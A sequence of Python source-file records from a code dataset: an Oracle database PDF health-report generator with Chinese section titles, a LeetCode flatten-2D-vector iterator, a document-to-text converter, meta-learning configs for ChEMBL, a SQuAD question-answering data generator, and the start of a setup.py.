'注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(64, 178, 84, 80, 48)))\n i_number += 1\n\n story.append(Paragraph('5.1.3 最近逻辑读消耗最高的前10条SQL', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库逻辑读消耗之SQL'\n\n data = [('SQL_ID', 'SQL_TEXT', 'BUFFER_GETS_TIME', 'CPU_TIME', 'COUNTS')]\n\n try:\n results = oracle.sql_buffer_top_hist()\n note = '注释:以上列出的是最近逻辑读资源消耗排名前十的SQL语句'\n except Exception:\n results = [('', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(64, 178, 84, 80, 48)))\n i_number += 1\n\n story.append(Paragraph('5.1.4 最近物执行次数最多的前10条SQL', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库SQL执行次数统计'\n\n data = [('SQL_ID', 'SQL_TEXT', 'EXECUTIONS', 'CPU_TIME', 'COUNTS')]\n\n try:\n results = oracle.sql_executions_top_hist()\n note = '注释:以上列出的是最近消执行次数排名前十的SQL语句'\n except Exception:\n results = [('', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(64, 178, 84, 80, 48)))\n i_number += 1\n\n story.append(Paragraph('5.1.5 最近排序消耗最高的前10条SQL', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库SQL排序资源统计'\n\n data = [('SQL_ID', 'SQL_TEXT', 'SORTS', 'CPU_TIME', 'COUNTS')]\n\n try:\n results = oracle.sql_sorts_top_hist()\n note = '注释:以上列出的是最近排序资源消耗排名前十的SQL语句'\n except Exception:\n results = [('', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(64, 178, 84, 80, 48)))\n i_number += 1\n\n story.append(PageBreak())\n story.append(Paragraph('5.2 日志增量统计', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库日志增长统计'\n\n ptitle = 'Log Increase'\n xlabel = 'Date'\n ylabel = 'Log Size(G)'\n try:\n results = oracle.log_increase()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[1])\n date.append(i[0])\n note = '注释:上图为数据库每日日志增长量。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n story.append(Paragraph('5.3 数据库关键指标分析', self.headerLevelStyles[1]))\n story.append(Paragraph('5.3.1 Buffer Cache命中率', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' + str(i_number) + ' ' + db['dbtitle'] + 'Buffer Cache命中率'\n\n ptitle = 'Buffer Cache Hit Ratio'\n xlabel = ''\n ylabel = 'Ratio(%)'\n try:\n results = oracle.buffer_hit_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[3])\n date.append(i[0])\n note = '注释:上图为数据库最近Buffer Cache命中率情况,命中率越高,表示缓存在内存中的数据使用效率越高,当改值小于95%时,物理IO等待可能会出现,要分析该命中率低的原因。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n story.append(Paragraph('5.3.2 Library Cache命中率', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' + str(i_number) + ' ' + db['dbtitle'] + 'Library Cache命中率'\n\n ptitle = 'Library Cache Hit Ratio'\n xlabel = ''\n ylabel = 'Ratio(%)'\n try:\n results = oracle.libraycache_hit_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[3])\n date.append(i[0])\n note = '注释:上图为数据库Library Cache命中率。这个比例通常应该保持在90%以上,否则就是库缓存太小或没有使用绑定变量。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n story.append(Paragraph('5.3.3 软解析率', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' + str(i_number) + ' ' + db['dbtitle'] + '软解析率'\n\n ptitle = 'Soft Parse Ratio'\n xlabel = ''\n ylabel = 'Ration(%)'\n try:\n results = oracle.soft_parse_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[3])\n date.append(i[0])\n note = '注释:上图为数据库软解析率。这个值小于<95%说明硬解析有点多,需要注意。如果低于80%,执行计划的共享就出了严重问题,解决方法当然还是加大库缓存或使用绑定变量。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n story.append(Paragraph('5.3.4 内存排序率', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' + str(i_number) + ' ' + db['dbtitle'] + '内存排序率'\n\n ptitle = 'Memory Sorts Ratio'\n xlabel = ''\n ylabel = 'Ratio'\n try:\n results = oracle.memory_sort_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[3])\n date.append(i[0])\n note = '注释:上图为数据库内存排序率。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n\n story.append(Paragraph('5.4 数据库等待与事件分析', self.headerLevelStyles[1]))\n story.append(Paragraph('5.4.1 数据库等待(按等待类划分)', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库排名前十的等待(等待类)'\n\n data = [('WAIT_CLASS', 'TOTAL_WAITS')]\n\n try:\n results = oracle.wait_class_hist()\n note = '注释:以上列出的是排名前十的等待事件。'\n except Exception:\n results = [('', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(354, 100)))\n i_number += 1\n\n story.append(Paragraph('5.4.2 数据库等待(按事件划分)', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库排名前20的等待(事件)'\n\n data = [('EVENT_NAME', 'TOTAL_WAITS')]\n\n try:\n results = oracle.event_top_hist()\n note = '注释:以上列出的是排名前20的等待事件。'\n except Exception:\n results = [('', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(354, 100)))\n i_number += 1\n\n story.append(Paragraph('5.5 数据库undo使用统计', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库undo使用情况'\n\n ptitle = 'Undo Usage'\n xlabel = ''\n ylabel = 'Number Of Blocks'\n try:\n results = oracle.undo_usage_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n date = []\n activeblks = []\n unexpiredblks = []\n expiredblks = []\n for i in results:\n date.append(i[0])\n activeblks.append(i[1])\n unexpiredblks.append(i[2])\n expiredblks.append(i[3])\n note = '注释:上图为数据库最近Undo使用情况,其中横坐标表示收集数据的事件,纵坐标表示块的数量,activeblks表示正在使用的undo块,unexpiredblks表示占用时间在undo rentention以内的undo块。根据Undo使用情况来对其大小进行适当调整,满足事务需要。'\n except Exception:\n activeblks = []\n unexpiredblks = []\n expiredblks = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n plt.figure(figsize=(20, 5))\n plt.plot([], [], color='m', label='activeblks')\n plt.plot([], [], color='c', label='unexpiredblks')\n plt.plot([], [], color='r', label='expiredblks')\n plt.stackplot(date, [activeblks, unexpiredblks, expiredblks], colors=['m', 'c', 'r'])\n\n plt.title('Undo Usage')\n plt.xlabel('Date')\n plt.ylabel('Number of Blks')\n plt.gcf().autofmt_xdate()\n plt.legend()\n\n imgdata = io.BytesIO()\n plt.savefig(imgdata, format='png')\n imgdata.seek(0) # rewind the data\n\n img = platImage(imgdata, 600, 180)\n\n story.append(img)\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n story.append(Paragraph('5.6 数据库总体性能', self.headerLevelStyles[1]))\n story.append(Paragraph('5.6.1 数据库负载情况', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库负载'\n\n ptitle = 'DB LOAD'\n xlabel = 'Date'\n ylabel = ''\n try:\n results = oracle.db_load_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[1])\n date.append(i[0])\n note = '注释:上图为数据库负载。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n story.append(Paragraph('5.6.2 数据��CPU使用情况', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' + str(i_number) + ' ' + db['dbtitle'] + 'CPU使用率'\n\n ptitle = 'CPU Usage Ratio'\n xlabel = 'Date'\n ylabel = 'Ratio'\n try:\n results = oracle.cpu_usage_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[6])\n date.append(i[2])\n note = '注释:上图为数据库CPU使用率。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n\n return story\n\n\n def makeBackupPart(self):\n story = []\n story.append(PageBreak())\n\n i_number = 1\n story.append(Paragraph('6. 数据库备份监测', self.headerLevelStyles[0]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n\n title = '表6.' + str(i_number) + ' ' + db['dbtitle'] + '数据库物理备份(RMAN)'\n data = [('DATABASE', 'TYPE', 'STATUS', 'ELAPSEDTIME', 'STARTTIME', 'INPUT_GB', 'OUTPUT_GB')]\n try:\n results = oracle.rman_backup()\n\n icount = 0\n\n for i in results:\n if i[2] == 'COMPLETED':\n icount += 1\n note = '注释:' + db['dbtitle'] + '最近1个月共有' + str(len(results)) + '次备份。其中成功备份' + str(icount) + '次, 失败备份' + str(len(results) - icount) + '次。'\n except Exception as e:\n print(e)\n results = [('', '', '', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n if len(results) > 20:\n results = results[0:10] + [('...','...','...','...','...','...','...')] + results[-10:]\n\n results = wrapTable(results)\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(48, 64, 67, 64, 83, 64, 64)))\n\n i_number += 1\n title = '表6.' + str(i_number) + ' ' + db['dbtitle'] + '数据库RMAN备份集'\n data = [('SET', 'TYPE', 'STATUS', 'STARTTIME', 'ELAPSED', 'SIZE', 'PATH')]\n try:\n results = oracle.rman_backupset()\n icount = 0\n for i in results:\n if i[2] == 'AVAILABLE':\n icount += 1\n note = '注释:' + db['dbtitle'] + '最近一个月共有' + str(len(results)) + '个备份集。其中可用备份集' + str(icount) + '个, 不可用备份' + str(len(results) - icount) + '个。'\n except Exception as e:\n print(e)\n results = [('', '', '', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n if len(results) > 20:\n results = results[0:10] + [('...','...','...','...','...','...','...')] + results[-10:]\n results = wrapTable(results, cols=(6))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(32, 32, 56, 88, 61, 32, 154)))\n\n i_number += 1\n\n return story\n\n def makeCurrentStatus(self):\n pass\n\n def makeLastPart(self):\n # 生产最后一页封面\n story = []\n story.append(NextPageTemplate('last_page'))\n story.append(PageBreak())\n story.append(Spacer(0, 0 * cm))\n\n return story\n\n\n def run(self, mode=None):\n # 添加文章各个部分\n story = []\n story.extend(self.makeFirstPart())\n story.extend(self.makeAuthorPart())\n story.extend(self.makeCopInfo())\n story.extend(self.makeContentPart())\n story.extend(self.makeManagedResourcetPart())\n story.extend(self.makeDBSummaryPart())\n if mode == 'month':\n story.extend(self.makeStoragePart())\n story.extend(self.makeDBObjectPart())\n story.extend(self.makePerformancePart())\n story.extend(self.makeBackupPart())\n\n if mode == 'now':\n story.append(self.makeCurrentStatus())\n\n story.extend(self.makeLastPart())\n\n # 创建pdf文档\n self.doc.multiBuild(story)\n \n\n\nif __name__ == '__main__':\n from utils import rptlogging\n # 导入配置文件\n from config import settings\n import os,sys\n \n# print(sys.path)\n \n path=settings.path_settings['resource'] + 'myreport.pdf'\n myconf = settings.ReportSetting(settings.path_settings['config'] + 'dbreport_gs.json')\n \n pdf = OracleReport(myconf,filename=path)\n \n logger = rptlogging.rptlogger(settings.ReportSetting().getPackageSetting()['logfile'])\n logger.info('Start generating report of database based on pdf format...')\n \n pdf.run()\n \n logger.info(\"Create pdf format report file: \" + '\"' + os.path.basename(path) + '\" successfully' + \" and it is saved to \" + '\"' + path + '\".')\n\n","sub_path":"report/oraclerpt.py","file_name":"oraclerpt.py","file_ext":"py","file_size_in_byte":67209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"588139491","text":"###Implement an iterator to flatten a 2d vector.\n\n###For example,\n###Given 2d vector =\n\n###[\n### [1,2],\n### [3],\n### [4,5,6]\n###]\n###By calling next repeatedly until hasNext returns false, the order of\n###elements returned by next should be: [1,2,3,4,5,6].\n\n\nclass Vector2D(object):\n \n ###@param vec2d {List[List[int]]}\n def __init__(self, vec2d):\n ###Initialize your data structure here\n self.vec2d = vec2d\n self.row = 0\n self.col = 0\n \n ###@return {int} a next element\n def next(self):\n ###Write your code here\n val = self.vec2d[self.row][self.col]\n \n if self.col < len(self.vec2d[self.row]) - 1:\n self.col += 1\n elif self.row < len(self.vec2d) - 1:\n self.row += 1\n self.col = 0\n else:\n self.col += 1\n return val\n \n ###@return {boolean} true if it has next element\n ###or false\n def hasNext(self):\n ###Write your code here\n if self.col <= len(self.vec2d[self.row]) - 1:\n return True\n elif self.row < len(self.vec2d) - 1:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n vec2d = [[1, 2], [3], [4, 5, 6]]\n i, v = Vector2D(vec2d), []\n while i.hasNext():\n v.append(i.next())\n print(v)\n","sub_path":"Leetcode/0251-Flatten-2D-Vector.py","file_name":"0251-Flatten-2D-Vector.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"473332875","text":"import io\nfrom subprocess import Popen, PIPE\nfrom docx import Document\nfrom pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter\nfrom pdfminer.converter import TextConverter\nfrom pdfminer.layout import LAParams\nfrom pdfminer.pdfpage import PDFPage\n\ndef convert_pdf_to_txt(path):\n rsrcmgr = PDFResourceManager()\n retstr = io.StringIO()\n codec = 'utf-8'\n laparams = LAParams()\n device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)\n fp = open(path, 'rb')\n # fp = path # path is _io.BufferedReader\n interpreter = PDFPageInterpreter(rsrcmgr, device)\n password = \"\"\n maxpages = 0\n caching = True\n pagenos = set()\n\n for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages,\n password=password,\n caching=caching,\n check_extractable=True):\n interpreter.process_page(page)\n\n text = retstr.getvalue()\n\n fp.close()\n device.close()\n retstr.close()\n return text\n\ndef document_to_text(file_path):\n if file_path[-4:] == \".doc\":\n cmd = ['antiword', file_path]\n p = Popen(cmd, stdout=PIPE)\n stdout, stderr = p.communicate()\n return stdout.decode('ascii', 'ignore')\n elif file_path[-5:] == \".docx\":\n document = Document(file_path)\n paratextlist = document.paragraphs\n \n newparatextlist = []\n for paratext in paratextlist:\n newparatextlist.append(paratext.text)\n\n newtableparatextlist = []\n for table in document.tables:\n for row in table.rows:\n for cell in row.cells:\n for paragraph in cell.paragraphs:\n newtableparatextlist.append(paragraph.text)\n \n return '\\n\\n'.join(newparatextlist + newtableparatextlist)\n elif file_path[-4:] == \".odt\":\n cmd = ['odt2txt', file_path]\n p = Popen(cmd, stdout=PIPE)\n stdout, stderr = p.communicate()\n return stdout.decode('ascii', 'ignore')\n","sub_path":"read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"256728512","text":"from sklearn.model_selection import ParameterGrid\nfrom metalearn.feature_extraction.transformers import SMILES_ALPHABET, MOL_ALPHABET, AMINO_ACID_ALPHABET, AdjGraphTransformer\n\ntransformer_ = AdjGraphTransformer()\ndataset_name = 'chembl'\ntest = True\n\nif test:\n shared_params_graph = dict(\n dataset_name=[dataset_name],\n dataset_params=[dict(use_graph=True, max_examples_per_episode=10, batch_size=32, max_tasks=100)],\n fit_params=[dict(n_epochs=100, steps_per_epoch=500)],\n )\n\n shared_params_smiles = dict(\n dataset_name=[dataset_name],\n dataset_params=[dict(use_graph=False, max_examples_per_episode=10, batch_size=32, max_tasks=100)],\n fit_params=[dict(n_epochs=100, steps_per_epoch=500)],\n )\nelse:\n shared_params_graph = dict(\n dataset_name=[dataset_name],\n dataset_params=[dict(use_graph=True, max_examples_per_episode=10, batch_size=32)],\n fit_params=[dict(n_epochs=100, steps_per_epoch=500)],\n )\n\n shared_params_smiles = dict(\n dataset_name=[dataset_name],\n dataset_params=[dict(use_graph=False, max_examples_per_episode=10, batch_size=32)],\n fit_params=[dict(n_epochs=100, steps_per_epoch=500)],\n )\n\nfeatures_extractor_params_graph = list(ParameterGrid(dict(\n arch=['gcnn'],\n in_size=[transformer_.n_atom_feat], \n layer_sizes=[[512 for _ in range(2)]], \n )))\n\nfeatures_extractor_params_smiles = list(ParameterGrid(dict(\n arch=['cnn'],\n vocab_size=[1+len(SMILES_ALPHABET)],\n embedding_size=[20],\n cnn_sizes=[[512 for _ in range(2)]],\n kernel_size=[2],\n dilatation_rate=[2],\n pooling_len=[1],\n use_bn=[False],\n normalize_features=[False])))\n\n\ntask_descr_extractor_params = list(ParameterGrid(dict(\n arch=['cnn'],\n vocab_size=[1 + len(AMINO_ACID_ALPHABET)],\n embedding_size=[20],\n cnn_sizes=[[256 for _ in range(2)]],\n kernel_size=[5],\n dilatation_rate=[2],\n pooling_len=[1],\n use_bn=[False],\n normalize_features=[False])))\n\n\ndef f_metakrr_sk(graph): \n return dict(\n model_name=['metakrr_sk'],\n model_params=list(ParameterGrid(dict(\n l2=[0.1],\n lr=[0.001],\n do_cv=[False],\n fixe_hps=[True],\n kernel=['linear', 'rbf'],\n feature_extractor_params=features_extractor_params_graph if graph else features_extractor_params_smiles,\n ))),\n **(shared_params_graph if graph else shared_params_smiles)\n )\n\n\ndef f_maml(graph):\n return dict(\n model_name=['maml'],\n model_params=list(ParameterGrid(dict(\n lr_learner=[0.01],\n n_epochs_learner=[1],\n feature_extractor_params=features_extractor_params_graph if graph else features_extractor_params_smiles,\n ))),\n **(shared_params_graph if graph else shared_params_smiles)\n )\n\n\ndef f_mann(graph): \n return dict(\n model_name=['mann'],\n model_params=list(ParameterGrid(dict(\n memory_shape=[(64, 40)],\n controller_size=[100],\n feature_extractor_params=features_extractor_params_graph if graph else features_extractor_params_smiles,\n ))),\n **(shared_params_graph if graph else shared_params_smiles)\n )\n\nimport copy\ns_copy = copy.deepcopy(shared_params_graph)\ns_copy['dataset_params'][0].update(dict(raw_inputs=True))\nfingerprint = dict(\n model_name=['fingerprint'],\n model_params=list(ParameterGrid(dict(\n algo=['kr'],\n fp=['morgan_circular'],\n ))),\n **s_copy\n)\n\nseqtoseq = dict(\n model_name=['seqtoseq'],\n model_params=list(ParameterGrid(dict(\n embedding_dim=[256], \n encoder_layers=[2], \n decoder_layers=[2], \n dropout=[0.1],\n ))),\n **shared_params_graph\n)\n\nif test:\n metakrr_sk = f_metakrr_sk(True)\n maml = f_maml(True)\n mann = f_mann(True)\nelse:\n metakrr_sk = f_metakrr_sk(False)\n maml = f_maml(False)\n mann = f_mann(False)","sub_path":"expts_iscb19/configs/config_chembl.py","file_name":"config_chembl.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"642550060","text":"import argparse\nimport numpy as np\nimport pandas as pd\nimport data_loader\nfrom nltk.tokenize.moses import MosesTokenizer\nfrom keras.preprocessing.text import Tokenizer, text_to_word_sequence\nfrom keras.preprocessing.sequence import pad_sequences\n\nclass DataGenerator():\n def __init__(self,\n inputs=None,\n tokenized_corpus=None,\n embedding_vectors=None,\n embedding_dim=None,\n max_word_num=None,\n max_sequence_len=None):\n \n super(DataGenerator, self).__init__()\n \n self.data = None\n self.context_vector = None\n self.question_vector = None\n self.answer_token_index = None # [start_location, end_location]\n self.vocabulary = None\n self.tokenizer = None\n self.embedding_matrix = None\n self.embedding_dim = embedding_dim\n \n self.context_vector, self.question_vector = self.get_vector(inputs, tokenized_corpus, max_word_num, max_sequence_len)\n self.answer_token_index = self.char_to_token_loc_mapping()\n self.embedding_matrix = self.get_embedding_matrix(embedding_vectors, embedding_dim)\n \n def read_word_pair(self, input):\n t = {}\n f = open(input, 'r')\n \n for line in f:\n key_val = line.rstrip().rsplit(' ')\n \n if len(key_val[1:]) == 1: # to read vocabulary (key=word, value=index)\n t[key_val[0]] = int(key_val[1])\n else: # to read embedding vectors (key=word, value=embedding vector)\n t[key_val[0]] = np.asarray(key_val[1:], dtype='float32')\n f.close()\n \n return t\n \n def create_vocab(self, inputs, maximum_word_num):\n '''\n create vocabulary based on tokenzied corpus\n '''\n # make tokenizer. But just used for word indexer\n tokenizer = Tokenizer(num_words = maximum_word_num+1, filters='', oov_token='UNK')\n \n # fit on input (tokenized) corpus\n f = open(inputs, 'r')\n corpus = [line for line in f]\n tokenizer.fit_on_texts(corpus)\n \n # create vocabulary\n tokenizer.word_index = {word:index for word, index in tokenizer.word_index.items() if index <= maximum_word_num}\n vocabulary = tokenizer.word_index\n \n print('number of unique tokens: {}'.format(len(vocabulary)))\n \n return tokenizer, vocabulary\n \n def char_to_token_loc_mapping(self):\n '''\n Mapping from character location in context to the corresponding token locations.\n Then, add answer start/end token index columns to the data.\n original text: self.data.context[c_i]\n tokenized text: c_tk\n token index: self.data.context_tk_index[c_i]\n '''\n nltk_tokenizer = MosesTokenizer()\n \n answer_start_token_idx_list, answer_end_token_idx_list = [], []\n for c_i, c_tk in enumerate(self.data.context_tk):\n answer_start = nltk_tokenizer.tokenize(self.data.context[c_i][self.data.answer_start[c_i]:], escape=False) # context text from the first answer token to end\n answer_end = nltk_tokenizer.tokenize(self.data.context[c_i][:self.data.answer_end[c_i]+1], escape=False) # context text from the first to end of answer token\n \n answer_start_token_idx = len(c_tk)- len(answer_start)\n answer_end_token_idx = answer_start_token_idx # initialize to start token location\n \n for i, tk in enumerate(c_tk[answer_start_token_idx:]):\n if tk == answer_end[-1]: # add to the index as many steps as it's moved to find the end of answer token\n answer_end_token_idx += i\n break\n \n '''\n Codes for verification:\n print(self.data.answer_text[c_i]) - Saint Bernadette Soubirous\n print(c_tk[answer_start_token_idx:answer_end_token_idx+1]) - ['Saint', 'Bernadette', 'Soubirous']\n for m in range(answer_start_token_idx, answer_end_token_idx+1): - 849 39352 39353\n print(self.tokenizer.word_index[c_tk[m].lower()], end =' ')\n print(answer_start_token_idx, answer_end_token_idx) - 102 104\n '''\n \n pad_counts = np.count_nonzero(self.context_vector[c_i] == 0)\n \n answer_start_token_idx_list.append(answer_start_token_idx + pad_counts)\n answer_end_token_idx_list.append(answer_end_token_idx + pad_counts)\n # print(self.context_vector[c_i][answer_start_token_idx_list[c_i]:answer_end_token_idx_list[c_i]+1])\n \n return list(zip(answer_start_token_idx_list, answer_end_token_idx_list))\n\n def get_vector(self, inputs, tokenized_corpus, max_word_num, max_sequence_len):\n loader = data_loader.DataLoader(inputs)\n self.data = pd.DataFrame({'title': loader.title, 'context': loader.context, 'question':loader.question, 'answer_start':loader.answer_start, 'answer_end':loader.answer_end, 'answer_text':loader.answer_text})\n \n self.tokenizer, self.vocabulary = self.create_vocab(tokenized_corpus, max_word_num)\n \n # tokenization & add tokens, token indexes to columns\n nltk_tokenizer = MosesTokenizer()\n vectors = []\n for i, text_column in enumerate(['context' , 'question']):\n self.data[text_column + '_tk'] = self.data[text_column].apply(lambda i: nltk_tokenizer.tokenize(i.replace('\\n', '').strip(), escape=False))\n \n # token to index\n self.data[text_column+'_tk_index'] = self.tokenizer.texts_to_sequences(self.data[text_column + '_tk'].apply(lambda i: ' '.join(i)))\n \n # padding: It returns context, question vectors.\n vectors.append(pad_sequences(self.data[text_column+'_tk_index'], max_sequence_len[i]))\n\n return vectors\n\n def get_embedding_matrix(self, embedding_vectors, embedding_dim):\n trained_wv = self.read_word_pair(embedding_vectors) # read (pre)trained embedding word vectors\n print('number of trained word vector: {}'.format(len(trained_wv)))\n \n embedding_matrix = np.zeros((len(self.vocabulary)+1, embedding_dim)) # Glove: (-1, 100)\n for word, idx in self.vocabulary.items():\n embedding_wv = trained_wv.get(word)\n if embedding_wv is not None:\n embedding_matrix[idx] = embedding_wv\n # else:\n # print(word, idx, embedding_wv)\n print('embedding matrix shape: {}'.format(embedding_matrix.shape))\n\n return embedding_matrix\n\nif __name__ == \"__main__\":\n inputs = 'data/train-v1.1.json'\n tokenized_corpus = 'corpus.tk.txt'\n embedding_vectors = '/Users/hoyeonlee/glove.6B/glove.6B.100d.txt'\n embedding_dim = 100\n max_word_num = 100000\n max_sequence_len = [300, 30]\n\n gen = DataGenerator(inputs, tokenized_corpus, embedding_vectors, embedding_dim, max_word_num, max_sequence_len)\n","sub_path":"question-answering-SQuAD/my/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":7072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"184021042","text":"#!/usr/bin/python\n\nfrom setuptools import setup, find_packages\n\nwith open('README.md', 'r') as readme:\n long_description = readme.read()\n\nsetup(name='riptide',\n\tversion='3.1.3', \n\tdescription='Reaction 